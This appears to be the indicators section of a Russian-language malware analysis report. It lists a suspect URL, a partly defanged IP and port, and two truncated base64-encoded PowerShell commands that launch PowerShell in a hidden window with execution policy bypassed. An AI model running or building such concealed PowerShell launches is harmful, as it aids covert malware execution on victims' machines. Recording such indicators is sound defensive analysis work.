Техническая информация
- http://172.29.50.46/2
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedCommand cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABCAHkAcABhAHMAcwAgAC0AbgBvAGwAbwBnAG8AI...
- '17#.#9.50.46':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedCommand cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABCAHkAcABhAHMAcwAgAC0AbgBvAGwAbwBnAG8AI...' (со скрытым окном)